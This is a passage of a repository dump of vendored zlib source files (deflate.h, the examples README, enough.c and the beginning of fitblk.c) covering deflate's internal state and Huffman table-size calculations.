if (flush == Z_NO_FLUSH) return need_more; break; /* flush the current block */ } } /* Output a literal byte */ s->match_length = 0; Tracevv((stderr,"%c", s->window[s->strstart])); _tr_tally_lit(s, s->window[s->strstart], bflush); s->lookahead--; s->strstart++; if (bflush) FLUSH_BLOCK(s, 0); } s->insert = 0; if (flush == Z_FINISH) { FLUSH_BLOCK(s, 1); return finish_done; } if (s->sym_next) FLUSH_BLOCK(s, 0); return block_done; } ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/deflate.h ================================================ /* deflate.h -- internal compression state * Copyright (C) 1995-2018 Jean-loup Gailly * For conditions of distribution and use, see copyright notice in zlib.h */ /* WARNING: this file should *not* be used by applications. It is part of the implementation of the compression library and is subject to change. Applications should only use zlib.h. */ /* @(#) $Id$ */ #ifndef DEFLATE_H #define DEFLATE_H #include "zutil.h" /* define NO_GZIP when compiling if you want to disable gzip header and trailer creation by deflate(). NO_GZIP would be used to avoid linking in the crc code when it is not needed. For shared libraries, gzip encoding should be left enabled. */ #ifndef NO_GZIP # define GZIP #endif /* =========================================================================== * Internal compression state. */ #define LENGTH_CODES 29 /* number of length codes, not counting the special END_BLOCK code */ #define LITERALS 256 /* number of literal bytes 0..255 */ #define L_CODES (LITERALS+1+LENGTH_CODES) /* number of Literal or Length codes, including the END_BLOCK code */ #define D_CODES 30 /* number of distance codes */ #define BL_CODES 19 /* number of codes used to transfer the bit lengths */ #define HEAP_SIZE (2*L_CODES+1) /* maximum heap size */ #define MAX_BITS 15 /* All codes must not exceed MAX_BITS bits */ #define Buf_size 16 /* size of bit buffer in bi_buf */ #define INIT_STATE 42 /* zlib header -> BUSY_STATE */ #ifdef GZIP # define GZIP_STATE 57 /* gzip header -> BUSY_STATE | EXTRA_STATE */ #endif #define EXTRA_STATE 69 /* gzip extra block -> NAME_STATE */ #define NAME_STATE 73 /* gzip file name -> COMMENT_STATE */ #define COMMENT_STATE 91 /* gzip comment -> HCRC_STATE */ #define HCRC_STATE 103 /* gzip header CRC -> BUSY_STATE */ #define BUSY_STATE 113 /* deflate -> FINISH_STATE */ #define FINISH_STATE 666 /* stream complete */ /* Stream status */ /* Data structure describing a single value and its code string. */ typedef struct ct_data_s { union { ush freq; /* frequency count */ ush code; /* bit string */ } fc; union { ush dad; /* father node in Huffman tree */ ush len; /* length of bit string */ } dl; } FAR ct_data; #define Freq fc.freq #define Code fc.code #define Dad dl.dad #define Len dl.len typedef struct static_tree_desc_s static_tree_desc; typedef struct tree_desc_s { ct_data *dyn_tree; /* the dynamic tree */ int max_code; /* largest code with non zero frequency */ const static_tree_desc *stat_desc; /* the corresponding static tree */ } FAR tree_desc; typedef ush Pos; typedef Pos FAR Posf; typedef unsigned IPos; /* A Pos is an index in the character window. We use short instead of int to * save space in the various tables. IPos is used only for parameter passing. */ typedef struct internal_state { z_streamp strm; /* pointer back to this zlib stream */ int status; /* as the name implies */ Bytef *pending_buf; /* output still pending */ ulg pending_buf_size; /* size of pending_buf */ Bytef *pending_out; /* next pending byte to output to the stream */ ulg pending; /* nb of bytes in the pending buffer */ int wrap; /* bit 0 true for zlib, bit 1 true for gzip */ gz_headerp gzhead; /* gzip header information to write */ ulg gzindex; /* where in extra, name, or comment */ Byte method; /* can only be DEFLATED */ int last_flush; /* value of flush param for previous deflate call */ /* used by deflate.c: */ uInt w_size; /* LZ77 window size (32K by default) */ uInt w_bits; /* log2(w_size) (8..16) */ uInt w_mask; /* w_size - 1 */ Bytef *window; /* Sliding window. Input bytes are read into the second half of the window, * and move to the first half later to keep a dictionary of at least wSize * bytes. With this organization, matches are limited to a distance of * wSize-MAX_MATCH bytes, but this ensures that IO is always * performed with a length multiple of the block size. Also, it limits * the window size to 64K, which is quite useful on MSDOS. * To do: use the user input buffer as sliding window. */ ulg window_size; /* Actual size of window: 2*wSize, except when the user input buffer * is directly used as sliding window. */ Posf *prev; /* Link to older string with same hash index. To limit the size of this * array to 64K, this link is maintained only for the last 32K strings. * An index in this array is thus a window index modulo 32K. */ Posf *head; /* Heads of the hash chains or NIL. */ uInt ins_h; /* hash index of string to be inserted */ uInt hash_size; /* number of elements in hash table */ uInt hash_bits; /* log2(hash_size) */ uInt hash_mask; /* hash_size-1 */ uInt hash_shift; /* Number of bits by which ins_h must be shifted at each input * step. It must be such that after MIN_MATCH steps, the oldest * byte no longer takes part in the hash key, that is: * hash_shift * MIN_MATCH >= hash_bits */ long block_start; /* Window position at the beginning of the current output block. Gets * negative when the window is moved backwards. */ uInt match_length; /* length of best match */ IPos prev_match; /* previous match */ int match_available; /* set if previous match exists */ uInt strstart; /* start of string to insert */ uInt match_start; /* start of matching string */ uInt lookahead; /* number of valid bytes ahead in window */ uInt prev_length; /* Length of the best match at previous step. Matches not greater than this * are discarded. This is used in the lazy match evaluation. */ uInt max_chain_length; /* To speed up deflation, hash chains are never searched beyond this * length. A higher limit improves compression ratio but degrades the * speed. */ uInt max_lazy_match; /* Attempt to find a better match only when the current match is strictly * smaller than this value. This mechanism is used only for compression * levels >= 4. */ # define max_insert_length max_lazy_match /* Insert new strings in the hash table only if the match length is not * greater than this length. This saves time but degrades compression. * max_insert_length is used only for compression levels <= 3. */ int level; /* compression level (1..9) */ int strategy; /* favor or force Huffman coding*/ uInt good_match; /* Use a faster search when the previous match is longer than this */ int nice_match; /* Stop searching when current match exceeds this */ /* used by trees.c: */ /* Didn't use ct_data typedef below to suppress compiler warning */ struct ct_data_s dyn_ltree[HEAP_SIZE]; /* literal and length tree */ struct ct_data_s dyn_dtree[2*D_CODES+1]; /* distance tree */ struct ct_data_s bl_tree[2*BL_CODES+1]; /* Huffman tree for bit lengths */ struct tree_desc_s l_desc; /* desc. for literal tree */ struct tree_desc_s d_desc; /* desc. for distance tree */ struct tree_desc_s bl_desc; /* desc. for bit length tree */ ush bl_count[MAX_BITS+1]; /* number of codes at each bit length for an optimal tree */ int heap[2*L_CODES+1]; /* heap used to build the Huffman trees */ int heap_len; /* number of elements in the heap */ int heap_max; /* element of largest frequency */ /* The sons of heap[n] are heap[2*n] and heap[2*n+1]. heap[0] is not used. * The same heap array is used to build all trees. */ uch depth[2*L_CODES+1]; /* Depth of each subtree used as tie breaker for trees of equal frequency */ uchf *sym_buf; /* buffer for distances and literals/lengths */ uInt lit_bufsize; /* Size of match buffer for literals/lengths. There are 4 reasons for * limiting lit_bufsize to 64K: * - frequencies can be kept in 16 bit counters * - if compression is not successful for the first block, all input * data is still in the window so we can still emit a stored block even * when input comes from standard input. (This can also be done for * all blocks if lit_bufsize is not greater than 32K.) * - if compression is not successful for a file smaller than 64K, we can * even emit a stored file instead of a stored block (saving 5 bytes). * This is applicable only for zip (not gzip or zlib). * - creating new Huffman trees less frequently may not provide fast * adaptation to changes in the input data statistics. (Take for * example a binary file with poorly compressible code followed by * a highly compressible string table.) Smaller buffer sizes give * fast adaptation but have of course the overhead of transmitting * trees more frequently. * - I can't count above 4 */ uInt sym_next; /* running index in sym_buf */ uInt sym_end; /* symbol table full when sym_next reaches this */ ulg opt_len; /* bit length of current block with optimal trees */ ulg static_len; /* bit length of current block with static trees */ uInt matches; /* number of string matches in current block */ uInt insert; /* bytes at end of window left to insert */ #ifdef ZLIB_DEBUG ulg compressed_len; /* total bit length of compressed file mod 2^32 */ ulg bits_sent; /* bit length of compressed data sent mod 2^32 */ #endif ush bi_buf; /* Output buffer. bits are inserted starting at the bottom (least * significant bits). */ int bi_valid; /* Number of valid bits in bi_buf. All bits above the last valid bit * are always zero. */ ulg high_water; /* High water mark offset in window for initialized bytes -- bytes above * this are set to zero in order to avoid memory check warnings when * longest match routines access bytes past the input. This is then * updated to the new high water mark. */ } FAR deflate_state; /* Output a byte on the stream. * IN assertion: there is enough room in pending_buf. */ #define put_byte(s, c) {s->pending_buf[s->pending++] = (Bytef)(c);} #define MIN_LOOKAHEAD (MAX_MATCH+MIN_MATCH+1) /* Minimum amount of lookahead, except at the end of the input file. * See deflate.c for comments about the MIN_MATCH+1. */ #define MAX_DIST(s) ((s)->w_size-MIN_LOOKAHEAD) /* In order to simplify the code, particularly on 16 bit machines, match * distances are limited to MAX_DIST instead of WSIZE. */ #define WIN_INIT MAX_MATCH /* Number of bytes after end of data in window to initialize in order to avoid memory checker errors from longest match routines */ /* in trees.c */ void ZLIB_INTERNAL _tr_init(deflate_state *s); int ZLIB_INTERNAL _tr_tally(deflate_state *s, unsigned dist, unsigned lc); void ZLIB_INTERNAL _tr_flush_block(deflate_state *s, charf *buf, ulg stored_len, int last); void ZLIB_INTERNAL _tr_flush_bits(deflate_state *s); void ZLIB_INTERNAL _tr_align(deflate_state *s); void ZLIB_INTERNAL _tr_stored_block(deflate_state *s, charf *buf, ulg stored_len, int last); #define d_code(dist) \ ((dist) < 256 ? _dist_code[dist] : _dist_code[256+((dist)>>7)]) /* Mapping from a distance to a distance code. dist is the distance - 1 and * must not have side effects. _dist_code[256] and _dist_code[257] are never * used. */ #ifndef ZLIB_DEBUG /* Inline versions of _tr_tally for speed: */ #if defined(GEN_TREES_H) || !defined(STDC) extern uch ZLIB_INTERNAL _length_code[]; extern uch ZLIB_INTERNAL _dist_code[]; #else extern const uch ZLIB_INTERNAL _length_code[]; extern const uch ZLIB_INTERNAL _dist_code[]; #endif # define _tr_tally_lit(s, c, flush) \ { uch cc = (c); \ s->sym_buf[s->sym_next++] = 0; \ s->sym_buf[s->sym_next++] = 0; \ s->sym_buf[s->sym_next++] = cc; \ s->dyn_ltree[cc].Freq++; \ flush = (s->sym_next == s->sym_end); \ } # define _tr_tally_dist(s, distance, length, flush) \ { uch len = (uch)(length); \ ush dist = (ush)(distance); \ s->sym_buf[s->sym_next++] = (uch)dist; \ s->sym_buf[s->sym_next++] = (uch)(dist >> 8); \ s->sym_buf[s->sym_next++] = len; \ dist--; \ s->dyn_ltree[_length_code[len]+LITERALS+1].Freq++; \ s->dyn_dtree[d_code(dist)].Freq++; \ flush = (s->sym_next == s->sym_end); \ } #else # define _tr_tally_lit(s, c, flush) flush = _tr_tally(s, 0, c) # define _tr_tally_dist(s, distance, length, flush) \ flush = _tr_tally(s, distance, length) #endif #endif /* DEFLATE_H */ ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/examples/README.examples ================================================ This directory contains examples of the use of zlib and other relevant programs and documentation. enough.c calculation and justification of ENOUGH parameter in inftrees.h - calculates the maximum table space used in inflate tree construction over all possible Huffman codes fitblk.c compress just enough input to nearly fill a requested output size - zlib isn't designed to do this, but fitblk does it anyway gun.c uncompress a gzip file - illustrates the use of inflateBack() for high speed file-to-file decompression using call-back functions - is approximately twice as fast as gzip -d - also provides Unix uncompress functionality, again twice as fast gzappend.c append to a gzip file - illustrates the use of the Z_BLOCK flush parameter for inflate() - illustrates the use of deflatePrime() to start at any bit gzjoin.c join gzip files without recalculating the crc or recompressing - illustrates the use of the Z_BLOCK flush parameter for inflate() - illustrates the use of crc32_combine() gzlog.c gzlog.h efficiently and robustly maintain a message log file in gzip format - illustrates use of raw deflate, Z_PARTIAL_FLUSH, deflatePrime(), and deflateSetDictionary() - illustrates use of a gzip header extra field gznorm.c normalize a gzip file by combining members into a single member - demonstrates how to concatenate deflate streams using Z_BLOCK zlib_how.html painfully comprehensive description of zpipe.c (see below) - describes in excruciating detail the use of deflate() and inflate() zpipe.c reads and writes zlib streams from stdin to stdout - illustrates the proper use of deflate() and inflate() - deeply commented in zlib_how.html (see above) zran.c zran.h index a zlib or gzip stream and randomly access it - illustrates the use of Z_BLOCK, inflatePrime(), and inflateSetDictionary() to provide random access ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/examples/enough.c ================================================ /* enough.c -- determine the maximum size of inflate's Huffman code tables over * all possible valid and complete prefix codes, subject to a length limit. * Copyright (C) 2007, 2008, 2012, 2018 Mark Adler * Version 1.5 5 August 2018 Mark Adler */ /* Version history: 1.0 3 Jan 2007 First version (derived from codecount.c version 1.4) 1.1 4 Jan 2007 Use faster incremental table usage computation Prune examine() search on previously visited states 1.2 5 Jan 2007 Comments clean up As inflate does, decrease root for short codes Refuse cases where inflate would increase root 1.3 17 Feb 2008 Add argument for initial root table size Fix bug for initial root table size == max - 1 Use a macro to compute the history index 1.4 18 Aug 2012 Avoid shifts more than bits in type (caused endless loop!) Clean up comparisons of different types Clean up code indentation 1.5 5 Aug 2018 Clean up code style, formatting, and comments Show all the codes for the maximum, and only the maximum */ /* Examine all possible prefix codes for a given number of symbols and a maximum code length in bits to determine the maximum table size for zlib's inflate. Only complete prefix codes are counted. Two codes are considered distinct if the vectors of the number of codes per length are not identical. So permutations of the symbol assignments result in the same code for the counting, as do permutations of the assignments of the bit values to the codes (i.e. only canonical codes are counted). We build a code from shorter to longer lengths, determining how many symbols are coded at each length. At each step, we have how many symbols remain to be coded, what the last code length used was, and how many bit patterns of that length remain unused. Then we add one to the code length and double the number of unused patterns to graduate to the next code length. We then assign all portions of the remaining symbols to that code length that preserve the properties of a correct and eventually complete code. Those properties are: we cannot use more bit patterns than are available; and when all the symbols are used, there are exactly zero possible bit patterns left unused. The inflate Huffman decoding algorithm uses two-level lookup tables for speed. There is a single first-level table to decode codes up to root bits in length (root == 9 for literal/length codes and root == 6 for distance codes, in the current inflate implementation). The base table has 1 << root entries and is indexed by the next root bits of input. Codes shorter than root bits have replicated table entries, so that the correct entry is pointed to regardless of the bits that follow the short code. If the code is longer than root bits, then the table entry points to a second-level table. The size of that table is determined by the longest code with that root-bit prefix. If that longest code has length len, then the table has size 1 << (len - root), to index the remaining bits in that set of codes. Each subsequent root-bit prefix then has its own sub-table. The total number of table entries required by the code is calculated incrementally as the number of codes at each bit length is populated. When all of the codes are shorter than root bits, then root is reduced to the longest code length, resulting in a single, smaller, one-level table. The inflate algorithm also provides for small values of root (relative to the log2 of the number of symbols), where the shortest code has more bits than root. In that case, root is increased to the length of the shortest code. This program, by design, does not handle that case, so it is verified that the number of symbols is less than 1 << (root + 1). In order to speed up the examination (by about ten orders of magnitude for the default arguments), the intermediate states in the build-up of a code are remembered and previously visited branches are pruned. The memory required for this will increase rapidly with the total number of symbols and the maximum code length in bits. However this is a very small price to pay for the vast speedup. First, all of the possible prefix codes are counted, and reachable intermediate states are noted by a non-zero count in a saved-results array. Second, the intermediate states that lead to (root + 1) bit or longer codes are used to look at all sub-codes from those junctures for their inflate memory usage. (The amount of memory used is not affected by the number of codes of root bits or less in length.) Third, the visited states in the construction of those sub-codes and the associated calculation of the table size is recalled in order to avoid recalculating from the same juncture. Beginning the code examination at (root + 1) bit codes, which is enabled by identifying the reachable nodes, accounts for about six of the orders of magnitude of improvement for the default arguments. About another four orders of magnitude come from not revisiting previous states. Out of approximately 2x10^16 possible prefix codes, only about 2x10^6 sub-codes need to be examined to cover all of the possible table memory usage cases for the default arguments of 286 symbols limited to 15-bit codes. Note that the uintmax_t type is used for counting. It is quite easy to exceed the capacity of an eight-byte integer with a large number of symbols and a large maximum code length, so multiple-precision arithmetic would need to replace the integer arithmetic in that case. This program will abort if an overflow occurs. The big_t type identifies where the counting takes place. The uintmax_t type is also used for calculating the number of possible codes remaining at the maximum length. This limits the maximum code length to the number of bits in a long long minus the number of bits needed to represent the symbols in a flat code. The code_t type identifies where the bit-pattern counting takes place. */ #include #include #include #include #include #include #define local static // Special data types. typedef uintmax_t big_t; // type for code counting #define PRIbig "ju" // printf format for big_t typedef uintmax_t code_t; // type for bit pattern counting struct tab { // type for been-here check size_t len; // allocated length of bit vector in octets char *vec; // allocated bit vector }; /* The array for saving results, num[], is indexed with this triplet: syms: number of symbols remaining to code left: number of available bit patterns at length len len: number of bits in the codes currently being assigned Those indices are constrained thusly when saving results: syms: 3..totsym (totsym == total symbols to code) left: 2..syms - 1, but only the evens (so syms == 8 -> 2, 4, 6) len: 1..max - 1 (max == maximum code length in bits) syms == 2 is not saved since that immediately leads to a single code. left must be even, since it represents the number of available bit patterns at the current length, which is double the number at the previous length. left ends at syms-1 since left == syms immediately results in a single code. (left > sym is not allowed since that would result in an incomplete code.) len is less than max, since the code completes immediately when len == max. The offset into the array is calculated for the three indices with the first one (syms) being outermost, and the last one (len) being innermost. We build the array with length max-1 lists for the len index, with syms-3 of those for each symbol. There are totsym-2 of those, with each one varying in length as a function of sym. See the calculation of index in map() for the index, and the calculation of size in main() for the size of the array. For the deflate example of 286 symbols limited to 15-bit codes, the array has 284,284 entries, taking up 2.17 MB for an 8-byte big_t. More than half of the space allocated for saved results is actually used -- not all possible triplets are reached in the generation of valid prefix codes. */ /* The array for tracking visited states, done[], is itself indexed identically to the num[] array as described above for the (syms, left, len) triplet. Each element in the array is further indexed by the (mem, rem) doublet, where mem is the amount of inflate table space used so far, and rem is the remaining unused entries in the current inflate sub-table. Each indexed element is simply one bit indicating whether the state has been visited or not. Since the ranges for mem and rem are not known a priori, each bit vector is of a variable size, and grows as needed to accommodate the visited states. mem and rem are used to calculate a single index in a triangular array. Since the range of mem is expected in the default case to be about ten times larger than the range of rem, the array is skewed to reduce the memory usage, with eight times the range for mem than for rem. See the calculations for offset and bit in been_here() for the details. For the deflate example of 286 symbols limited to 15-bit codes, the bit vectors grow to total 5.5 MB, in addition to the 4.3 MB done array itself. */ // Type for a variable-length, allocated string. typedef struct { char *str; // pointer to allocated string size_t size; // size of allocation size_t len; // length of string, not including terminating zero } string_t; // Clear a string_t. local void string_clear(string_t *s) { s->str[0] = 0; s->len = 0; } // Initialize a string_t. local void string_init(string_t *s) { s->size = 16; s->str = malloc(s->size); assert(s->str != NULL && "out of memory"); string_clear(s); } // Release the allocation of a string_t. local void string_free(string_t *s) { free(s->str); s->str = NULL; s->size = 0; s->len = 0; } // Save the results of printf with fmt and the subsequent argument list to s. // Each call appends to s. The allocated space for s is increased as needed. local void string_printf(string_t *s, char *fmt, ...) { va_list ap; va_start(ap, fmt); size_t len = s->len; int ret = vsnprintf(s->str + len, s->size - len, fmt, ap); assert(ret >= 0 && "out of memory"); s->len += ret; if (s->size < s->len + 1) { do { s->size <<= 1; assert(s->size != 0 && "overflow"); } while (s->size < s->len + 1); s->str = realloc(s->str, s->size); assert(s->str != NULL && "out of memory"); vsnprintf(s->str + len, s->size - len, fmt, ap); } va_end(ap); } // Globals to avoid propagating constants or constant pointers recursively. struct { int max; // maximum allowed bit length for the codes int root; // size of base code table in bits int large; // largest code table so far size_t size; // number of elements in num and done big_t tot; // total number of codes with maximum tables size string_t out; // display of subcodes for maximum tables size int *code; // number of symbols assigned to each bit length big_t *num; // saved results array for code counting struct tab *done; // states already evaluated array } g; // Index function for num[] and done[]. local inline size_t map(int syms, int left, int len) { return ((size_t)((syms - 1) >> 1) * ((syms - 2) >> 1) + (left >> 1) - 1) * (g.max - 1) + len - 1; } // Free allocated space in globals. local void cleanup(void) { if (g.done != NULL) { for (size_t n = 0; n < g.size; n++) if (g.done[n].len) free(g.done[n].vec); g.size = 0; free(g.done); g.done = NULL; } free(g.num); g.num = NULL; free(g.code); g.code = NULL; string_free(&g.out); } // Return the number of possible prefix codes using bit patterns of lengths len // through max inclusive, coding syms symbols, with left bit patterns of length // len unused -- return -1 if there is an overflow in the counting. Keep a // record of previous results in num to prevent repeating the same calculation. local big_t count(int syms, int left, int len) { // see if only one possible code if (syms == left) return 1; // note and verify the expected state assert(syms > left && left > 0 && len < g.max); // see if we've done this one already size_t index = map(syms, left, len); big_t got = g.num[index]; if (got) return got; // we have -- return the saved result // we need to use at least this many bit patterns so that the code won't be // incomplete at the next length (more bit patterns than symbols) int least = (left << 1) - syms; if (least < 0) least = 0; // we can use at most this many bit patterns, lest there not be enough // available for the remaining symbols at the maximum length (if there were // no limit to the code length, this would become: most = left - 1) int most = (((code_t)left << (g.max - len)) - syms) / (((code_t)1 << (g.max - len)) - 1); // count all possible codes from this juncture and add them up big_t sum = 0; for (int use = least; use <= most; use++) { got = count(syms - use, (left - use) << 1, len + 1); sum += got; if (got == (big_t)-1 || sum < got) // overflow return (big_t)-1; } // verify that all recursive calls are productive assert(sum != 0); // save the result and return it g.num[index] = sum; return sum; } // Return true if we've been here before, set to true if not. Set a bit in a // bit vector to indicate visiting this state. Each (syms,len,left) state has a // variable size bit vector indexed by (mem,rem). The bit vector is lengthened // as needed to allow setting the (mem,rem) bit. local int been_here(int syms, int left, int len, int mem, int rem) { // point to vector for (syms,left,len), bit in vector for (mem,rem) size_t index = map(syms, left, len); mem -= 1 << g.root; // mem always includes the root table mem >>= 1; // mem and rem are always even rem >>= 1; size_t offset = (mem >> 3) + rem; offset = ((offset * (offset + 1)) >> 1) + rem; int bit = 1 << (mem & 7); // see if we've been here size_t length = g.done[index].len; if (offset < length && (g.done[index].vec[offset] & bit) != 0) return 1; // done this! // we haven't been here before -- set the bit to show we have now // see if we need to lengthen the vector in order to set the bit if (length <= offset) { // if we have one already, enlarge it, zero out the appended space char *vector; if (length) { do { length <<= 1; } while (length <= offset); vector = realloc(g.done[index].vec, length); assert(vector != NULL && "out of memory"); memset(vector + g.done[index].len, 0, length - g.done[index].len); } // otherwise we need to make a new vector and zero it out else { length = 16; while (length <= offset) length <<= 1; vector = calloc(length, 1); assert(vector != NULL && "out of memory"); } // install the new vector g.done[index].len = length; g.done[index].vec = vector; } // set the bit g.done[index].vec[offset] |= bit; return 0; } // Examine all possible codes from the given node (syms, len, left). Compute // the amount of memory required to build inflate's decoding tables, where the // number of code structures used so far is mem, and the number remaining in // the current sub-table is rem. local void examine(int syms, int left, int len, int mem, int rem) { // see if we have a complete code if (syms == left) { // set the last code entry g.code[len] = left; // complete computation of memory used by this code while (rem < left) { left -= rem; rem = 1 << (len - g.root); mem += rem; } assert(rem == left); // if this is at the maximum, show the sub-code if (mem >= g.large) { // if this is a new maximum, update the maximum and clear out the // printed sub-codes from the previous maximum if (mem > g.large) { g.large = mem; string_clear(&g.out); } // compute the starting state for this sub-code syms = 0; left = 1 << g.max; for (int bits = g.max; bits > g.root; bits--) { syms += g.code[bits]; left -= g.code[bits]; assert((left & 1) == 0); left >>= 1; } // print the starting state and the resulting sub-code to g.out string_printf(&g.out, "<%u, %u, %u>:", syms, g.root + 1, ((1 << g.root) - left) << 1); for (int bits = g.root + 1; bits <= g.max; bits++) if (g.code[bits]) string_printf(&g.out, " %d[%d]", g.code[bits], bits); string_printf(&g.out, "\n"); } // remove entries as we drop back down in the recursion g.code[len] = 0; return; } // prune the tree if we can if (been_here(syms, left, len, mem, rem)) return; // we need to use at least this many bit patterns so that the code won't be // incomplete at the next length (more bit patterns than symbols) int least = (left << 1) - syms; if (least < 0) least = 0; // we can use at most this many bit patterns, lest there not be enough // available for the remaining symbols at the maximum length (if there were // no limit to the code length, this would become: most = left - 1) int most = (((code_t)left << (g.max - len)) - syms) / (((code_t)1 << (g.max - len)) - 1); // occupy least table spaces, creating new sub-tables as needed int use = least; while (rem < use) { use -= rem; rem = 1 << (len - g.root); mem += rem; } rem -= use; // examine codes from here, updating table space as we go for (use = least; use <= most; use++) { g.code[len] = use; examine(syms - use, (left - use) << 1, len + 1, mem + (rem ? 1 << (len - g.root) : 0), rem << 1); if (rem == 0) { rem = 1 << (len - g.root); mem += rem; } rem--; } // remove entries as we drop back down in the recursion g.code[len] = 0; } // Look at all sub-codes starting with root + 1 bits. Look at only the valid // intermediate code states (syms, left, len). For each completed code, // calculate the amount of memory required by inflate to build the decoding // tables. Find the maximum amount of memory required and show the codes that // require that maximum. local void enough(int syms) { // clear code for (int n = 0; n <= g.max; n++) g.code[n] = 0; // look at all (root + 1) bit and longer codes string_clear(&g.out); // empty saved results g.large = 1 << g.root; // base table if (g.root < g.max) // otherwise, there's only a base table for (int n = 3; n <= syms; n++) for (int left = 2; left < n; left += 2) { // look at all reachable (root + 1) bit nodes, and the // resulting codes (complete at root + 2 or more) size_t index = map(n, left, g.root + 1); if (g.root + 1 < g.max && g.num[index]) // reachable node examine(n, left, g.root + 1, 1 << g.root, 0); // also look at root bit codes with completions at root + 1 // bits (not saved in num, since complete), just in case if (g.num[index - 1] && n <= left << 1) examine((n - left) << 1, (n - left) << 1, g.root + 1, 1 << g.root, 0); } // done printf("maximum of %d table entries for root = %d\n", g.large, g.root); fputs(g.out.str, stdout); } // Examine and show the total number of possible prefix codes for a given // maximum number of symbols, initial root table size, and maximum code length // in bits -- those are the command arguments in that order. The default values // are 286, 9, and 15 respectively, for the deflate literal/length code. The // possible codes are counted for each number of coded symbols from two to the // maximum. The counts for each of those and the total number of codes are // shown. The maximum number of inflate table entries is then calculated across // all possible codes. Each new maximum number of table entries and the // associated sub-code (starting at root + 1 == 10 bits) is shown. // // To count and examine prefix codes that are not length-limited, provide a // maximum length equal to the number of symbols minus one. // // For the deflate literal/length code, use "enough". For the deflate distance // code, use "enough 30 6". int main(int argc, char **argv) { // set up globals for cleanup() g.code = NULL; g.num = NULL; g.done = NULL; string_init(&g.out); // get arguments -- default to the deflate literal/length code int syms = 286; g.root = 9; g.max = 15; if (argc > 1) { syms = atoi(argv[1]); if (argc > 2) { g.root = atoi(argv[2]); if (argc > 3) g.max = atoi(argv[3]); } } if (argc > 4 || syms < 2 || g.root < 1 || g.max < 1) { fputs("invalid arguments, need: [sym >= 2 [root >= 1 [max >= 1]]]\n", stderr); return 1; } // if not restricting the code length, the longest is syms - 1 if (g.max > syms - 1) g.max = syms - 1; // determine the number of bits in a code_t int bits = 0; for (code_t word = 1; word; word <<= 1) bits++; // make sure that the calculation of most will not overflow if (g.max > bits || (code_t)(syms - 2) >= ((code_t)-1 >> (g.max - 1))) { fputs("abort: code length too long for internal types\n", stderr); return 1; } // reject impossible code requests if ((code_t)(syms - 1) > ((code_t)1 << g.max) - 1) { fprintf(stderr, "%d symbols cannot be coded in %d bits\n", syms, g.max); return 1; } // allocate code vector g.code = calloc(g.max + 1, sizeof(int)); assert(g.code != NULL && "out of memory"); // determine size of saved results array, checking for overflows, // allocate and clear the array (set all to zero with calloc()) if (syms == 2) // iff max == 1 g.num = NULL; // won't be saving any results else { g.size = syms >> 1; int n = (syms - 1) >> 1; assert(g.size <= (size_t)-1 / n && "overflow"); g.size *= n; n = g.max - 1; assert(g.size <= (size_t)-1 / n && "overflow"); g.size *= n; g.num = calloc(g.size, sizeof(big_t)); assert(g.num != NULL && "out of memory"); } // count possible codes for all numbers of symbols, add up counts big_t sum = 0; for (int n = 2; n <= syms; n++) { big_t got = count(n, 2, 1); sum += got; assert(got != (big_t)-1 && sum >= got && "overflow"); } printf("%"PRIbig" total codes for 2 to %d symbols", sum, syms); if (g.max < syms - 1) printf(" (%d-bit length limit)\n", g.max); else puts(" (no length limit)"); // allocate and clear done array for been_here() if (syms == 2) g.done = NULL; else { g.done = calloc(g.size, sizeof(struct tab)); assert(g.done != NULL && "out of memory"); } // find and show maximum inflate table usage if (g.root > g.max) // reduce root to max length g.root = g.max; if ((code_t)syms < ((code_t)1 << (g.root + 1))) enough(syms); else fputs("cannot handle minimum code lengths > root", stderr); // done cleanup(); return 0; } ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/examples/fitblk.c ================================================ /* fitblk.c: example of fitting compressed output to a specified size Not copyrighted -- provided to the public domain Version 1.1 25 November 2004 Mark Adler */ /* Version history: 1.0 24 Nov 2004 First version 1.1 25 Nov 2004 Change deflateInit2() to deflateInit() Use fixed-size, stack-allocated raw buffers Simplify code moving compression to subroutines Use assert() for internal errors Add detailed description of approach */ /* Approach to just fitting a requested compressed size: fitblk performs three compression passes on a portion of the input data in order to determine how much of that input will compress to nearly the requested output block size. The first pass generates enough deflate blocks to produce output to fill the requested output size plus a specified excess amount (see the EXCESS define below). The last deflate block may go quite a bit past that, but is discarded. The second pass decompresses and recompresses just the compressed data that fit in the requested plus excess sized buffer. The deflate process is terminated after that amount of input, which is less than the amount consumed on the first pass. The last deflate block of the result will be of a comparable size to the final product, so that the header for that deflate block and the compression ratio for that block will be about the same as in the final product. The third compression pass decompresses the result of the second step, but only the compressed data up to the requested size minus an amount to allow the compressed stream to complete (see the MARGIN define below). That will result in a final compressed stream whose length is less than or equal to the requested size. Assuming sufficient input and a requested size greater than a few hundred bytes, the shortfall will typically be less than ten bytes. If the input is short enough that the first compression completes before filling the requested output size, then that compressed stream is return with no recompression. EXCESS is chosen to be just greater than the shortfall seen in a two pass approach similar to the above. That shortfall is due to the last deflate block compressing more efficiently with a smaller header on the second pass. EXCESS is set to be large enough so that there is enough uncompressed data for the second pass to fill out the requested size, and small enough so that the final deflate block of the second pass will be close in size to the final deflate block of the third and final pass. MARGIN is chosen to be just large enough to assure that the final compression has enough room to complete in all cases. */ #include #include #include #include "zlib.h" #define local static /* print nastygram and leave */ local void quit(char *why) { fprintf(stderr, "fitblk abort: %s\n", why); exit(1); } #define RAWLEN 4096 /* intermediate uncompressed buffer size */ /* compress from file to def until provided buffer is full or end of input reached; return last deflate() return value, or Z_ERRNO if there was read error on the file */ local int partcompress(FILE *in, z_streamp def) { int ret, flush; unsigned char raw[RAWLEN]; flush = Z_NO_FLUSH; do { def->avail_in = fread(raw, 1, RAWLEN, in); if (ferror(in)) return Z_ERRNO; def->next_in = raw; if (feof(in)) flush = Z_FINISH; ret = deflate(def, flush); assert(ret != Z_STREAM_ERROR); } while (def->avail_out != 0 && flush == Z_NO_FLUSH); return ret; } /* recompress from inf's input to def's output; the input for inf and the output for def are set in those structures before calling; return last deflate() return value, or Z_MEM_ERROR if inflate() was not able to allocate enough memory when it needed to */ local int recompress(z_streamp inf, z_streamp def) { int ret, flush; unsigned char raw[RAWLEN]; flush = Z_NO_FLUSH; do { /* decompress */ inf->avail_out = RAWLEN; inf->next_out = raw; ret = inflate(inf, Z_NO_FLUSH); assert(ret != Z_STREAM_ERROR && ret != Z_DATA_ERROR && ret != Z_NEED_DICT); if (ret == 